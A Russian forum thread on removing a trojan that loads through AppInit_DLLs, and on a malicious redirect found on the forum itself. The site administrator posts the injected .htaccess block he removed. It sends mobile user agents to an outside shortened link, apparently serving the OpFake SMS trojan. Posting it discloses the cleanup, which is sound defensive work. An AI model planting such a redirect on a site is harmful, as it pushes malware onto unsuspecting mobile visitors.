Антивирус ругается. Вирус на бритва ру?

[Тайлер]

ivan-3, обратитесь на специализированные сайты.
http://defendium.info/forum.php" onclick="window.open(this.href);return false;
http://virusinfo.info/forum.php" onclick="window.open(this.href);return false;

Перед обращением прочитайте правила подачи запроса, и сделайте логи. Дождитесь ответа хелпера.

[Cynic]

Ну, этого гада можно и ручками удавить.

Запускаем regedit.
Находим ключ HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
вот тут и прописан запуск гадости.
Например - это может быть jjrfwbh.dll (но и с любым другим названием тоже).

Для полной очистки совести - "скармливаем" эту .dll какому либо "онлайновуму проверятелю".

Если это вирус - удаляем значение ключа.

Если после перезагрузки проблема перестала проявляться - находим и удаляем сам файл:
C:\WINDOWS\system32\jjrfwbh.dll (или как его там?)
Хотя без прямого его вызова/запуска он не опасен. Просто мусор.
Ещё может остаться мусор (поиск и удаление которого лучше поручить антивирусу) типа
C:\WINDOWS\system32\cpldapu\produkey.exe

Но нужно помнить, что (естественно) через AppInit_DLLs могут запускаться и нужные .dll, но они (их отсутствие) не должно быть критичным для запуска/работы самой системы.
Т.е. можно очистить значение AppInit_DLLs и не вдаваясь в подробности, но при этом не вредно (из параноидальности подхода) записать где-то, что именно удалили.

[Тайлер]

Библиотека может загружаться и через Winlogon Notify

Если чистить вручную, можно использовать Hijack This

Запускаем Хайджек, принимаем условия пользовательского соглашения - I Accept
Запускаем проверку - Do a system scan and save a logfile
Получаем лог - hijackthis.log в той же папке, где и сама утилита.
Загружаем его сюда: http://www.hijackthis.de/en" onclick="window.open(this.href);return false;
И смотрим. Легитимные записи помечены зеленой галочкой. Сомнительный - красным крестиком.

Ключи Winlogon Notify и App Init DLLs расположены в секции 020
Чтобы удалить, в окне HiJack This отмечаем галочкой строку и жмем Fix checked
В случае Winlogon Notify и App Init DLLs удалятся только записи в реестре, но не сами файлы.

Но в системе могут быть еще какие-то звери, и хайджеком можно найти не все.
Главное не заниматься самолечением и не выполнять чужие скрипты, которые можно нагуглить по этой проблеме. Скрипты пишутся индивидуально для каждого случая.

[ivan-3]

Благодаря советам Cynicа я быстро и успешно справился с проблемой.
Файл скормил по одной из ссылок в теме. с результатом 7 из 49 опознаний троян.
За что ему огромное спасибо!

[Cynic]

Библиотека может загружаться и через

Ну, раз пошла такая песня... Есть очень полезная для подобных вещей утилита от Марка Руссиновича (Mark Russinovich) - autoruns. Она позволяет увидеть всё "автозапускаемое" и порулить.
(Кто-то будет сильно удивлён, насколько через многие места/способы в винде возможна загрузка чего-либо исполняемого. И как много этого "автозагружаемого".)

Осторожно - средство сильнодействующее, не для полных "чайников"!

Ну и вообще - утилиты, известные как продукты от Winternals" и/или Sys Internals - "услада сисадмина".
(Я удивлён, но они (некоторые из них) таки обновляются и после приобретения их microsoft'ом. Правда раздаются они через "задний проход" и часть ссылок там дохлые...)

Для тех, кому нужны мощные специализированные инструменты - они должны быть интересны. (В Сети это всё можно найти.)

[mr.al347]

Не нашел кнопки обратной связи с администрацией сайта, поэтому здесь напишу.
Суть проблемы: при попытке зайти на форум со смартфона NOKIA идет перенаправление на какой-то лоховской сайт browserzu.com, который истерически требует обновить мобильный браузер. Проблема возникает как при Opera mini 7, так и при использовании встроенного мобильного браузера.
Челом бью , изничтожте эту мерзость (вирус). Нет у меня на даче другого интернета, кроме мобильного, а на чтение форума уже подсел крепко.

[Олег Бритва]

Захожу с андроидного коммуникатора, никогда вопросов не было... Странно...

[Onza76]

Олег Бритва, попробовал с моей nokia - такая же ерунда, как и у mr.al347. Видимо, касяк в ПО nokia.

[aleksej]

Было так же 1 августа, смартфон на android 4.0.

[Aleks Ander]

Каким-то неведомым образом просочилась на сайт одна сволочь. Она была обнаружена и изничтожена. Сейчас проблема есть?

[N*X*S]

Проблема осталась, пользуюсь Samsung Galaxy Note(N7000), android 4.0.3
Вот что я вижу при входе с N7000 на форум.

[Олег Бритва]

Хрена!!!!!!!!!!!!!!!!


Позавчера заходил идеально, а сёдня такая же хрень как у тебя...

[mr.al347]

Проблема еще осталась пока.

[Олег Бритва]

Есть, согласен, только что проверял.

[Aleks Ander]

Ищу...

[Neff]

По ходу это кажется OpFake - модификация Spitmo (банковский троян, заточеный под кражу доступа к банковским счетам и платежным системам). Троян отсылает в "фоновом" режиме смски на платные номера и чистит папку СМС.
На сайте администрация решит, что и как делать, а пользователям рекомендуется посмотреть куда лезет браузер, например __l-moby_.ru/?_r=10294 и удалить из \SYS\BIN\NokiaMediaPlugin.exe

Ссылка покоцана мной для безопасности

[Aleks Ander]

Найдено. Удалено. Будь они прокляты, суки.

Для очкастых

Show

Данный текст добавляется в основной .htaccess форума.

Код: Выделить всё

<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
RewriteRule ^(.*)$ http://goo.gl/oAbDO [L,R=302]
</IfModule>

[Олег Бритва]

+1

[mr.al347]

Гранд мерси. Усе летает.

[ajks]

Ну вот, а то было как то дискомфортно
не всегда комп под рукой